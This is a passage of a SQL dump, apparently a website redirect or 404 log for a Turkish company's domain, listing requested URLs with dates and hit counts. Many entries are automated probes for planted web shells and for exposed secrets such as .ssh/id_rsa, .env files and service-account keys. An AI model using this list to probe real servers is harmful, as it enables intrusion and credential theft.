00:00:00',301),(65912,'http://3s-technologies.com.tr/tr/wp-content/themes/corsa/functions.php',NULL,'','',1,0,'2026-05-28 21:26:11','0000-00-00 00:00:00',301),(65913,'http://3s-technologies.com.tr/tr/consultantx/wp-load.php',NULL,'','',1,0,'2026-05-28 21:26:12','0000-00-00 00:00:00',301),(65914,'http://3s-technologies.com.tr/tr/plugins/woocommerce/templates/taxonomy-product_cat.php',NULL,'','',1,0,'2026-05-28 21:26:13','0000-00-00 00:00:00',301),(65915,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-exception.php',NULL,'','',1,0,'2026-05-28 21:26:13','0000-00-00 00:00:00',301),(65916,'http://3s-technologies.com.tr/tr/includes/wc-template-functions.php',NULL,'','',1,0,'2026-05-28 21:26:14','0000-00-00 00:00:00',301),(65917,'http://3s-technologies.com.tr/tr/themes/basel/404.php',NULL,'','',1,0,'2026-05-28 21:26:15','0000-00-00 00:00:00',301),(65918,'http://3s-technologies.com.tr/tr/themes/wp-yellow-hats/single-projects.php',NULL,'','',1,0,'2026-05-28 21:26:16','0000-00-00 00:00:00',301),(65919,'http://3s-technologies.com.tr/tr/themes/kadence/header.php',NULL,'','',1,0,'2026-05-28 21:26:22','0000-00-00 00:00:00',301),(65920,'http://3s-technologies.com.tr/tr/codedrunss.rockerkinetic.com/a2n9akfu.php',NULL,'','',1,0,'2026-05-28 21:26:23','0000-00-00 00:00:00',301),(65921,'http://3s-technologies.com.tr/tr/rockfin/wp-includes/wp-db.php',NULL,'','',1,0,'2026-05-28 21:26:23','0000-00-00 00:00:00',301),(65922,'http://3s-technologies.com.tr/tr/wp-content/plugins/backuply/backup_ins.php',NULL,'','',1,0,'2026-05-28 21:26:24','0000-00-00 00:00:00',301),(65923,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-automatic-updater.php',NULL,'','',1,0,'2026-05-28 21:26:25','0000-00-00 00:00:00',301),(65924,'http://3s-technologies.com.tr/tr/consultantx/wp-includes/general-template.php',NULL,'','',1,0,'2026-05-28 21:26:26','0000-00-00 00:00:00',301),(65925,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/lib/sodium_compat.php',NULL,'','',1,0,'2026-05-28 21:26:26','0000-00-00 00:00:00',301),(65926,'http://3s-technologies.com.tr/tr/lunv.php',NULL,'','',1,0,'2026-05-28 21:26:36','0000-00-00 00:00:00',301),(65927,'http://3s-technologies.com.tr/tr/widgets-form.php',NULL,'','',1,0,'2026-05-28 21:26:38','0000-00-00 00:00:00',301),(65928,'http://3s-technologies.com.tr/tr/pxx.php',NULL,'','',1,0,'2026-05-28 21:26:40','0000-00-00 00:00:00',301),(65929,'http://3s-technologies.com.tr/tr/azntlsxk.php',NULL,'','',1,0,'2026-05-28 21:26:40','0000-00-00 00:00:00',301),(65930,'http://3s-technologies.com.tr/tr/ayzv4.php',NULL,'','',1,0,'2026-05-28 21:26:43','0000-00-00 00:00:00',301),(65931,'http://3s-technologies.com.tr/tr/0bk5w8ti.php',NULL,'','',1,0,'2026-05-28 21:26:44','0000-00-00 00:00:00',301),(65932,'http://3s-technologies.com.tr/tr/cgborhkh.php',NULL,'','',1,0,'2026-05-28 21:26:46','0000-00-00 00:00:00',301),(65933,'http://3s-technologies.com.tr/tr/sktjlh5u.php',NULL,'','',1,0,'2026-05-28 21:26:46','0000-00-00 00:00:00',301),(65934,'http://3s-technologies.com.tr/tr/yj03.php',NULL,'','',1,0,'2026-05-28 21:26:48','0000-00-00 00:00:00',301),(65935,'http://3s-technologies.com.tr/tr/bless25.php',NULL,'','',1,0,'2026-05-28 21:26:52','0000-00-00 00:00:00',301),(65936,'http://3s-technologies.com.tr/tr/ppx.php',NULL,'','',1,0,'2026-05-28 21:26:53','0000-00-00 00:00:00',301),(65937,'http://3s-technologies.com.tr/tr/499.php',NULL,'','',1,0,'2026-05-28 21:26:54','0000-00-00 00:00:00',301),(65938,'http://3s-technologies.com.tr/tr/brfiv3kt.php',NULL,'','',1,0,'2026-05-28 21:26:55','0000-00-00 00:00:00',301),(65939,'http://3s-technologies.com.tr/tr/ultrasparga.php',NULL,'','',1,0,'2026-05-28 21:27:01','0000-00-00 00:00:00',301),(65940,'http://3s-technologies.com.tr/tr/hypnotist.php',NULL,'','',1,0,'2026-05-28 21:27:02','0000-00-00 00:00:00',301),(65941,'http://3s-technologies.com.tr/tr/lzx2.php',NULL,'','',1,0,'2026-05-28 21:27:02','0000-00-00 00:00:00',301),(65942,'http://3s-technologies.com.tr/tr/core/init.php',NULL,'','',2,0,'2026-05-29 11:24:31','0000-00-00 00:00:00',301),(65943,'http://3s-technologies.com.tr/tr/phpinfo/info.php',NULL,'','',2,0,'2026-05-29 11:24:53','0000-00-00 00:00:00',301),(65944,'http://3s-technologies.com.tr/tr/z.ph',NULL,'','',2,0,'2026-05-29 11:26:24','0000-00-00 00:00:00',301),(65945,'http://3s-technologies.com.tr/tr/xroot7.php',NULL,'','',2,0,'2026-05-29 11:26:25','0000-00-00 00:00:00',301),(65946,'https://3s-technologies.com.tr/tr/.ssh/id_rsa',NULL,'','',1,0,'2026-05-29 22:32:25','0000-00-00 00:00:00',301),(65947,'https://3s-technologies.com.tr/tr/server-status',NULL,'','',1,0,'2026-05-29 22:32:29','0000-00-00 00:00:00',301),(65948,'https://3s-technologies.com.tr/en/docs',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65949,'https://3s-technologies.com.tr/en/features',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65950,'https://3s-technologies.com.tr/en/services',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65951,'https://3s-technologies.com.tr/en/pricing',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65952,'https://3s-technologies.com.tr/en/about',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65953,'https://3s-technologies.com.tr/en/affiliate',NULL,'','',1,0,'2026-05-29 23:06:19','0000-00-00 00:00:00',301),(65954,'http://3s-technologies.com.tr/tr/zxc0z',NULL,'','',1,0,'2026-05-30 06:48:55','0000-00-00 00:00:00',301),(65955,'http://3s-technologies.com.tr/tr/md5.php',NULL,'','',1,0,'2026-05-31 19:29:29','0000-00-00 00:00:00',301),(65956,'http://3s-technologies.com.tr/tr/garcoy.php',NULL,'','',1,0,'2026-05-31 19:29:31','0000-00-00 00:00:00',301),(65957,'https://3s-technologies.com.tr/en/service-account-key.json',NULL,'https://3s-technologies.com.tr/service-account-key.json','',1,0,'2026-05-31 19:55:07','0000-00-00 00:00:00',301),(65958,'https://3s-technologies.com.tr/en/sa-private-key.json',NULL,'https://3s-technologies.com.tr/sa-private-key.json','',1,0,'2026-05-31 19:55:07','0000-00-00 00:00:00',301),(65959,'http://3s-technologies.com.tr/tr/this_is_a_new_hello_world.php',NULL,'','',5,0,'2026-06-01 21:48:12','0000-00-00 00:00:00',301),(65960,'http://3s-technologies.com.tr/tr/admin/plugins/elfinder/connectors/php/connector.php',NULL,'','',2,0,'2026-06-02 05:36:10','0000-00-00 00:00:00',301),(65961,'https://3s-technologies.com.tr/en/vault.env',NULL,'https://3s-technologies.com.tr/vault.env','',1,0,'2026-06-02 07:21:15','0000-00-00 00:00:00',301),(65962,'https://3s-technologies.com.tr/en/config.env',NULL,'https://3s-technologies.com.tr/config.env','',1,0,'2026-06-02 07:21:32','0000-00-00 00:00:00',301),(65963,'https://3s-technologies.com.tr/en/api/v1/settings',NULL,'https://3s-technologies.com.tr/api/v1/settings','',2,0,'2026-06-02 07:21:49','0000-00-00 00:00:00',301),(65964,'https://3s-technologies.com.tr/en/api/settings',NULL,'https://3s-technologies.com.tr/api/settings','',2,0,'2026-06-02 07:21:49','0000-00-00 00:00:00',301),(65965,'http://mail.3s-technologies.com.tr/tr/this_is_a_new_hello_world.php',NULL,'','',1,0,'2026-06-02 12:04:32','0000-00-00 00:00:00',301),(65966,'http://mail.3s-technologies.com.tr/tr/300.php7',NULL,'','',1,0,'2026-06-02 12:05:46','0000-00-00 00:00:00',301),(65967,'http://mail.3s-technologies.com.tr/tr/201.php7',NULL,'','',1,0,'2026-06-02 12:05:46','0000-00-00 00:00:00',301),(65968,'http://mail.3s-technologies.com.tr/tr/aj12.php',NULL,'','',1,0,'2026-06-02 12:05:48','0000-00-00 00:00:00',301),(65969,'http://mail.3s-technologies.com.tr/tr/ovo7xf.php',NULL,'','',1,0,'2026-06-02 12:05:50','0000-00-00 00:00:00',301),(65970,'http://mail.3s-technologies.com.tr/tr/206.php',NULL,'','',1,0,'2026-06-02 12:05:50','0000-00-00 00:00:00',301),(65971,'http://mail.3s-technologies.com.tr/tr/ey5.php',NULL,'','',1,0,'2026-06-02 12:05:52','0000-00-00 00:00:00',301),(65972,'http://3s-technologies.com.tr/tr/bitrix/components/bitrix/catalog/templates/.default/.parameterss.php',NULL,'','',1,0,'2026-06-02 15:41:25','0000-00-00 00:00:00',301),(65973,'https://3s-technologies.com.tr/tr/key.json',NULL,'https://3s-technologies.com.tr/key.json','',1,0,'2026-06-02 17:06:34','0000-00-00 00:00:00',301),(65974,'https://www.3s-technologies.com.tr/en/images/logo/logo-3s.jpg',NULL,'https://crm.xiaoman.cn/','',1,0,'2026-06-04 09:19:48','0000-00-00 00:00:00',301),(65975,'https://3s-technologies.com.tr/en/debug/pprof/cmdline',NULL,'https://3s-technologies.com.tr/debug/pprof/cmdline','',1,0,'2026-06-06 16:06:47','0000-00-00 00:00:00',301),(65976,'https://3s-technologies.com.tr/en/.well-known/jwks.json',NULL,'https://3s-technologies.com.tr/.well-known/jwks.json','',1,0,'2026-06-06 16:07:07','0000-00-00 00:00:00',301),(65977,'https://3s-technologies.com.tr/en/api/v2/config',NULL,'https://3s-technologies.com.tr/api/v2/config','',1,0,'2026-06-06 16:07:13','0000-00-00 00:00:00',301),(65978,'https://3s-technologies.com.tr/en/loadable-stats.json',NULL,'https://3s-technologies.com.tr/loadable-stats.json','',1,0,'2026-06-06 16:07:46','0000-00-00 00:00:00',301),(65979,'https://3s-technologies.com.tr/en/asset-manifest.json',NULL,'https://3s-technologies.com.tr/asset-manifest.json','',1,0,'2026-06-06 16:07:46','0000-00-00 00:00:00',301),(65980,'https://3s-technologies.com.tr/en/.next/required-server-files.json',NULL,'https://3s-technologies.com.tr/.next/required-server-files.json','',1,0,'2026-06-06 16:07:46','0000-00-00 00:00:00',301),(65981,'https://3s-technologies.com.tr/tr/member/.env',NULL,'https://3s-technologies.com.tr/member/.env','',1,0,'2026-06-07 04:35:57','0000-00-00 00:00:00',301),(65982,'http://3s-technologies.com.tr/tr/bitrix/js/main/jquery/jquery-1.12.4.min.js.php',NULL,'','',2,0,'2026-06-07 15:29:57','0000-00-00 00:00:00',301),(65983,'https://3s-technologies.com.tr/en/wp-json/gravitysmtp/v1/tests/mock-data',NULL,'https://3s-technologies.com.tr/','',1,0,'2026-06-07 20:48:30','0000-00-00 00:00:00',301),(65984,'https://3s-technologies.com.tr/en/195f2759f30b.php',NULL,'https://3s-technologies.com.tr/tmp/195f2759f30b.phar','',4,0,'2026-06-08 04:22:29','0000-00-00 00:00:00',301),(65985,'http://3s-technologies.com.tr/en/wp-includes/core.php',NULL,'www.google.com','',1,0,'2026-06-08 14:46:32','0000-00-00 00:00:00',301),(65986,'http://3s-technologies.com.tr/tr/.env_production',NULL,'','',1,0,'2026-06-08 16:33:31','0000-00-00 00:00:00',301),(65987,'https://3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/tests/mock-data',NULL,'https://3s-technologies.com.tr/wp-json/gravitysmtp/v1/tests/mock-data','',2,0,'2026-06-08 20:55:50','0000-00-00 00:00:00',301),(65988,'https://3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/settings',NULL,'https://3s-technologies.com.tr/wp-json/gravitysmtp/v1/settings','',1,0,'2026-06-08 20:55:51','0000-00-00 00:00:00',301),(65989,'https://3s-technologies.com.tr/tr/wp-json/wp/v2/settings',NULL,'https://3s-technologies.com.tr/wp-json/wp/v2/settings','',1,0,'2026-06-08 20:55:51','0000-00-00 00:00:00',301),(65990,'https://3s-technologies.com.tr/tr/wp-json/gravitysmtp/v1/config',NULL,'https://3s-technologies.com.tr/wp-json/gravitysmtp/v1/config','',1,0,'2026-06-08 20:55:52','0000-00-00 00:00:00',301),(65991,'http://www.3s-technologies.com.tr/tr/joomla/templates/system/css/template.css',NULL,'http://www.3s-technologies.com.tr/joomla/templates/system/css/template.css','',1,0,'2026-06-09 03:38:00','0000-00-00 00:00:00',301),(65992,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css','',1,0,'2026-06-09 03:38:05','0000-00-00 00:00:00',301),(65993,'http://www.3s-technologies.com.tr/tr/joomla/templates/system/css/general.css',NULL,'http://www.3s-technologies.com.tr/joomla/templates/system/css/general.css','',1,0,'2026-06-09 03:38:46','0000-00-00 00:00:00',301),(65994,'http://www.3s-technologies.com.tr/tr/joomla/templates/_system/css/general.css',NULL,'http://www.3s-technologies.com.tr/joomla/templates/_system/css/general.css','',1,0,'2026-06-09 03:38:46','0000-00-00 00:00:00',301),(65995,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_briaskiss/mod_briaskiss.js',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_briaskISS/mod_briaskISS.js','',1,0,'2026-06-09 03:38:58','0000-00-00 00:00:00',301),(65996,'http://www.3s-technologies.com.tr/tr/joomla/templates/starlight-ob/css/template.css',NULL,'http://www.3s-technologies.com.tr/joomla/templates/starlight-ob/css/template.css','',1,0,'2026-06-09 03:38:59','0000-00-00 00:00:00',301),(65997,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_briaskiss/mod_briaskiss.css',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_briaskISS/mod_briaskISS.css','',1,0,'2026-06-09 03:39:02','0000-00-00 00:00:00',301),(65998,'http://www.3s-technologies.com.tr/tr/joomla/templates/starlight-ob/css/starlight.css',NULL,'http://www.3s-technologies.com.tr/joomla/templates/starlight-ob/css/starlight.css','',1,0,'2026-06-09 03:39:14','0000-00-00 00:00:00',301),(65999,'http://www.3s-technologies.com.tr/tr/joomla/media/system/js/validate.js',NULL,'http://www.3s-technologies.com.tr/joomla/media/system/js/validate.js','',1,0,'2026-06-09 03:39:14','0000-00-00 00:00:00',301),(66000,'http://www.3s-technologies.com.tr/tr/joomla/media/system/js/mootools.js',NULL,'http://www.3s-technologies.com.tr/joomla/media/system/js/mootools.js','',1,0,'2026-06-09 03:39:17','0000-00-00 00:00:00',301),(66001,'http://www.3s-technologies.com.tr/tr/joomla/media/system/js/caption.js',NULL,'http://www.3s-technologies.com.tr/joomla/media/system/js/caption.js','',1,0,'2026-06-09 03:39:18','0000-00-00 00:00:00',301),(66002,'http://www.3s-technologies.com.tr/tr/joomla/templates/starlight-ob/js/screen.js',NULL,'http://www.3s-technologies.com.tr/joomla/templates/starlight-ob/js/screen.js','',1,0,'2026-06-09 03:40:22','0000-00-00 00:00:00',301),(66003,'http://www.3s-technologies.com.tr/en/joomla/plugins/content/jw_allvideos/players/ac_quicktime.js',NULL,'http://www.3s-technologies.com.tr/joomla/plugins/content/jw_allvideos/players/AC_QuickTime.js','',1,0,'2026-06-09 03:40:23','0000-00-00 00:00:00',301),(66004,'http://www.3s-technologies.com.tr/joomla/index.php?lang=tr&limitstart=5',NULL,'','',1,0,'2026-06-09 03:40:28','0000-00-00 00:00:00',301),(66005,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&lang=tr&type=rss',NULL,'','',1,0,'2026-06-09 03:40:28','0000-00-00 00:00:00',301),(66006,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&lang=tr&type=atom',NULL,'','',1,0,'2026-06-09 03:40:29','0000-00-00 00:00:00',301),(66007,'http://www.3s-technologies.com.tr/tr/joomla/templates/starlight-ob/js/buttons.js',NULL,'http://www.3s-technologies.com.tr/joomla/templates/starlight-ob/js/buttons.js','',1,0,'2026-06-09 03:40:52','0000-00-00 00:00:00',301),(66008,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&lang=en&type=rss',NULL,'','',1,0,'2026-06-09 03:40:53','0000-00-00 00:00:00',301),(66009,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&lang=en&type=atom',NULL,'','',1,0,'2026-06-09 03:40:53','0000-00-00 00:00:00',301),(66010,'http://www.3s-technologies.com.tr/tr/joomla/templates/starlight-ob/js/buttons_starlight.js',NULL,'http://www.3s-technologies.com.tr/joomla/templates/starlight-ob/js/buttons_starlight.js','',1,0,'2026-06-09 03:41:15','0000-00-00 00:00:00',301),(66011,'http://www.3s-technologies.com.tr/joomla/index.php?lang=en&limitstart=5',NULL,'','',1,0,'2026-06-09 03:41:15','0000-00-00 00:00:00',301),(66012,'http://www.3s-technologies.com.tr/tr/joomla/components/com_joomfish/images/flags/tr.gif',NULL,'http://www.3s-technologies.com.tr/joomla/components/com_joomfish/images/flags/tr.gif','',1,0,'2026-06-09 03:41:16','0000-00-00 00:00:00',301),(66013,'http://www.3s-technologies.com.tr/tr/joomla/plugins/content/jw_allvideos/players/silverlight.js',NULL,'http://www.3s-technologies.com.tr/joomla/plugins/content/jw_allvideos/players/silverlight.js','',1,0,'2026-06-09 03:41:32','0000-00-00 00:00:00',301),(66014,'http://www.3s-technologies.com.tr/tr/joomla/components/com_mailto/assets/close-x.png',NULL,'http://www.3s-technologies.com.tr/joomla/components/com_mailto/assets/close-x.png','',1,0,'2026-06-09 03:41:33','0000-00-00 00:00:00',301),(66015,'http://www.3s-technologies.com.tr/tr/joomla/components/com_joomfish/images/flags/en.gif',NULL,'http://www.3s-technologies.com.tr/joomla/components/com_joomfish/images/flags/en.gif','',1,0,'2026-06-09 03:41:43','0000-00-00 00:00:00',301),(66016,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_vvisit_counter/images/vweek.gif',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_vvisit_counter/images/vweek.gif','',1,0,'2026-06-09 03:41:45','0000-00-00 00:00:00',301),(66017,'http://www.3s-technologies.com.tr/tr/joomla/plugins/content/jw_allvideos/players/wmvplayer.js',NULL,'http://www.3s-technologies.com.tr/joomla/plugins/content/jw_allvideos/players/wmvplayer.js','',1,0,'2026-06-09 03:42:13','0000-00-00 00:00:00',301),(66018,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/emailbutton.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/emailButton.png','',1,0,'2026-06-09 03:42:52','0000-00-00 00:00:00',301),(66019,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_vvisit_counter/images/vall.gif',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_vvisit_counter/images/vall.gif','',1,0,'2026-06-09 03:43:25','0000-00-00 00:00:00',301),(66020,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_vvisit_counter/images/vmonth.gif',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_vvisit_counter/images/vmonth.gif','',1,0,'2026-06-09 03:43:52','0000-00-00 00:00:00',301),(66021,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/printbutton.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/printButton.png','',1,0,'2026-06-09 03:43:53','0000-00-00 00:00:00',301),(66022,'http://www.3s-technologies.com.tr/tr/joomla/modules/mod_vvisit_counter/images/mechanical/0.gif',NULL,'http://www.3s-technologies.com.tr/joomla/modules/mod_vvisit_counter/images/mechanical/0.gif','',1,0,'2026-06-09 03:44:44','0000-00-00 00:00:00',301),(66023,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/pdf_button.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/urunler/pdf_button.png','',1,0,'2026-06-09 03:45:44','0000-00-00 00:00:00',301),(66024,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/banner_v5.bmp',NULL,'http://www.3s-technologies.com.tr/joomla/images/urunler/banner_v5.bmp','',1,0,'2026-06-09 03:46:16','0000-00-00 00:00:00',301),(66025,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/pdf_button.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/pdf_button.png','',1,0,'2026-06-09 03:46:18','0000-00-00 00:00:00',301),(66026,'http://www.3s-technologies.com.tr/tr/joomla/images/stories/adres_1.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/stories/adres_1.png','',1,0,'2026-06-09 03:46:57','0000-00-00 00:00:00',301),(66027,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/con_tel.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/con_tel.png','',1,0,'2026-06-09 03:46:59','0000-00-00 00:00:00',301),(66028,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/indent1.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/indent1.png','',1,0,'2026-06-09 03:47:31','0000-00-00 00:00:00',301),(66029,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/arrow.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/arrow.png','',1,0,'2026-06-09 03:47:32','0000-00-00 00:00:00',301),(66030,'http://www.3s-technologies.com.tr/tr/joomla/images/m_images/con_fax.png',NULL,'http://www.3s-technologies.com.tr/joomla/images/M_images/con_fax.png','',1,0,'2026-06-09 03:47:47','0000-00-00 00:00:00',301),(66031,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/wave-solder-ews-310-web.gif',NULL,'http://www.3s-technologies.com.tr/joomla/images/urunler/wave-solder-ews-310-web.gif','',1,0,'2026-06-09 03:48:38','0000-00-00 00:00:00',301),(66032,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/win2009/all.jpg',NULL,'http://www.3s-technologies.com.tr/joomla/images/urunler/Win2009/all.jpg','',1,0,'2026-06-09 03:48:40','0000-00-00 00:00:00',301),(66033,'http://www.3s-technologies.com.tr/tr/joomla/images/urunler/kart_uretim/kart-baslik.jpg',NULL,'http://www.3s-technologies.com.tr/joomla/images/urunler/Kart_Uretim/Kart-Baslik.jpg','',1,0,'2026-06-09 03:50:48','0000-00-00 00:00:00',301),(66034,'https://3s-technologies.com.tr/tr/jk',NULL,'','',1,0,'2026-06-09 05:04:51','0000-00-00 00:00:00',301),(66035,'https://3s-technologies.com.tr/tr/shopping/banningorder/1018634852.html',NULL,'https://3s-technologies.com.tr/shopping/banningorder/1018634852.html','',1,0,'2026-06-10 21:38:01','0000-00-00 00:00:00',301),(66036,'https://3s-technologies.com.tr/tr/shopping/queencraft/2423323468.html',NULL,'https://3s-technologies.com.tr/shopping/queencraft/2423323468.html','',1,0,'2026-06-10 21:38:06','0000-00-00 00:00:00',301),(66037,'https://3s-technologies.com.tr/tr/shopping/enjailing/703472495.html',NULL,'https://3s-technologies.com.tr/shopping/enjailing/703472495.html','',1,0,'2026-06-10 21:38:11','0000-00-00 00:00:00',301),(66038,'https://3s-technologies.com.tr/tr/shopping/airsick/2486560019.html',NULL,'https://3s-technologies.com.tr/shopping/airsick/2486560019.html','',1,0,'2026-06-10 21:38:16','0000-00-00 00:00:00',301),(66039,'https://3s-technologies.com.tr/tr/shopping/zoosperm/2794272834.html',NULL,'https://3s-technologies.com.tr/shopping/zoosperm/2794272834.html','',1,0,'2026-06-10 21:38:21','0000-00-00 00:00:00',301),(66040,'https://3s-technologies.com.tr/tr/shopping/friendlessness/2407356993.html',NULL,'https://3s-technologies.com.tr/shopping/friendlessness/2407356993.html','',1,0,'2026-06-10 21:38:25','0000-00-00 00:00:00',301),(66041,'https://3s-technologies.com.tr/tr/shopping/menhaden/2197347198.html',NULL,'https://3s-technologies.com.tr/shopping/menhaden/2197347198.html','',1,0,'2026-06-10 21:38:37','0000-00-00 00:00:00',301),(66042,'https://3s-technologies.com.tr/tr/shopping/carbonize/1085822520.html',NULL,'https://3s-technologies.com.tr/shopping/carbonize/1085822520.html','',1,0,'2026-06-10 21:38:40','0000-00-00 00:00:00',301),(66043,'https://3s-technologies.com.tr/tr/shopping/wrench/2279496244.html',NULL,'https://3s-technologies.com.tr/shopping/wrench/2279496244.html','',1,0,'2026-06-10 21:38:46','0000-00-00 00:00:00',301),(66044,'https://3s-technologies.com.tr/tr/shopping/adverbialize/3191048154.html',NULL,'https://3s-technologies.com.tr/shopping/adverbialize/3191048154.html','',1,0,'2026-06-10 21:38:50','0000-00-00 00:00:00',301),(66045,'https://3s-technologies.com.tr/tr/shopping/incompliantly/157383837.html',NULL,'https://3s-technologies.com.tr/shopping/incompliantly/157383837.html','',1,0,'2026-06-10 21:38:55','0000-00-00 00:00:00',301),(66046,'https://3s-technologies.com.tr/tr/shopping/villas/2804008101.html',NULL,'https://3s-technologies.com.tr/shopping/villas/2804008101.html','',1,0,'2026-06-10 21:39:12','0000-00-00 00:00:00',301),(66047,'https://3s-technologies.com.tr/tr/shopping/agleam/1189097509.html',NULL,'https://3s-technologies.com.tr/shopping/agleam/1189097509.html','',1,0,'2026-06-10 21:39:15','0000-00-00 00:00:00',301),(66048,'https://3s-technologies.com.tr/tr/shopping/enfiercing/81768234.html',NULL,'https://3s-technologies.com.tr/shopping/enfiercing/81768234.html','',1,0,'2026-06-10 21:39:21','0000-00-00 00:00:00',301),(66049,'https://3s-technologies.com.tr/tr/shopping/exametron/3475437598.html',NULL,'https://3s-technologies.com.tr/shopping/exametron/3475437598.html','',1,0,'2026-06-10 21:39:25','0000-00-00 00:00:00',301),(66050,'https://3s-technologies.com.tr/tr/shopping/communicably/2707270021.html',NULL,'https://3s-technologies.com.tr/shopping/communicably/2707270021.html','',1,0,'2026-06-10 21:39:30','0000-00-00 00:00:00',301),(66051,'https://3s-technologies.com.tr/tr/shopping/teetuck/2054153962.html',NULL,'https://3s-technologies.com.tr/shopping/teetuck/2054153962.html','',1,0,'2026-06-10 21:39:35','0000-00-00 00:00:00',301),(66052,'https://3s-technologies.com.tr/tr/shopping/chlorotic/2294034515.html',NULL,'https://3s-technologies.com.tr/shopping/chlorotic/2294034515.html','',1,0,'2026-06-10 21:39:40','0000-00-00 00:00:00',301),(66053,'https://3s-technologies.com.tr/tr/shopping/tangram/3994802960.html',NULL,'https://3s-technologies.com.tr/shopping/tangram/3994802960.html','',1,0,'2026-06-10 21:39:45','0000-00-00 00:00:00',301),(66054,'https://3s-technologies.com.tr/tr/shopping/beguine/3853454115.html',NULL,'https://3s-technologies.com.tr/shopping/beguine/3853454115.html','',1,0,'2026-06-10 21:39:50','0000-00-00 00:00:00',301),(66055,'https://3s-technologies.com.tr/tr/shopping/gulden/4257651729.html',NULL,'https://3s-technologies.com.tr/shopping/gulden/4257651729.html','',1,0,'2026-06-10 21:39:55','0000-00-00 00:00:00',301),(66056,'https://3s-technologies.com.tr/tr/shopping/ordaining/2459048150.html',NULL,'https://3s-technologies.com.tr/shopping/ordaining/2459048150.html','',1,0,'2026-06-10 21:40:00','0000-00-00 00:00:00',301),(66057,'https://3s-technologies.com.tr/tr/shopping/mahout/4248080333.html',NULL,'https://3s-technologies.com.tr/shopping/mahout/4248080333.html','',1,0,'2026-06-10 21:40:05','0000-00-00 00:00:00',301),(66058,'https://3s-technologies.com.tr/tr/shopping/aftersails/2290398218.html',NULL,'https://3s-technologies.com.tr/shopping/aftersails/2290398218.html','',1,0,'2026-06-10 21:40:10','0000-00-00 00:00:00',301),(66059,'https://3s-technologies.com.tr/tr/shopping/verve/1423202795.html',NULL,'https://3s-technologies.com.tr/shopping/verve/1423202795.html','',1,0,'2026-06-10 21:40:15','0000-00-00 00:00:00',301),(66060,'https://3s-technologies.com.tr/tr/shopping/inconcocted/2144713899.html',NULL,'https://3s-technologies.com.tr/shopping/inconcocted/2144713899.html','',1,0,'2026-06-10 21:40:20','0000-00-00 00:00:00',301),(66061,'https://3s-technologies.com.tr/tr/shopping/anniversarily/1546080556.html',NULL,'https://3s-technologies.com.tr/shopping/anniversarily/1546080556.html','',1,0,'2026-06-10 21:40:25','0000-00-00 00:00:00',301),(66062,'https://3s-technologies.com.tr/tr/shopping/castlery/571783399.html',NULL,'https://3s-technologies.com.tr/shopping/castlery/571783399.html','',1,0,'2026-06-10 21:40:30','0000-00-00 00:00:00',301),(66063,'https://3s-technologies.com.tr/tr/shopping/cannonry/1836697893.html',NULL,'https://3s-technologies.com.tr/shopping/cannonry/1836697893.html','',1,0,'2026-06-10 21:40:35','0000-00-00 00:00:00',301),(66064,'https://3s-technologies.com.tr/tr/shopping/longshore/1058673274.html',NULL,'https://3s-technologies.com.tr/shopping/longshore/1058673274.html','',1,0,'2026-06-10 21:40:40','0000-00-00 00:00:00',301),(66065,'https://3s-technologies.com.tr/tr/shopping/crore/2038404407.html',NULL,'https://3s-technologies.com.tr/shopping/crore/2038404407.html','',1,0,'2026-06-10 21:40:45','0000-00-00 00:00:00',301),(66066,'https://3s-technologies.com.tr/tr/shopping/sinto/3600479949.html',NULL,'https://3s-technologies.com.tr/shopping/sinto/3600479949.html','',1,0,'2026-06-10 21:40:50','0000-00-00 00:00:00',301),(66067,'https://3s-technologies.com.tr/tr/shopping/geographic/4013975047.html',NULL,'https://3s-technologies.com.tr/shopping/geographic/4013975047.html','',1,0,'2026-06-10 21:40:55','0000-00-00 00:00:00',301),(66068,'https://3s-technologies.com.tr/tr/shopping/complacence/516595613.html',NULL,'https://3s-technologies.com.tr/shopping/complacence/516595613.html','',1,0,'2026-06-10 21:41:00','0000-00-00 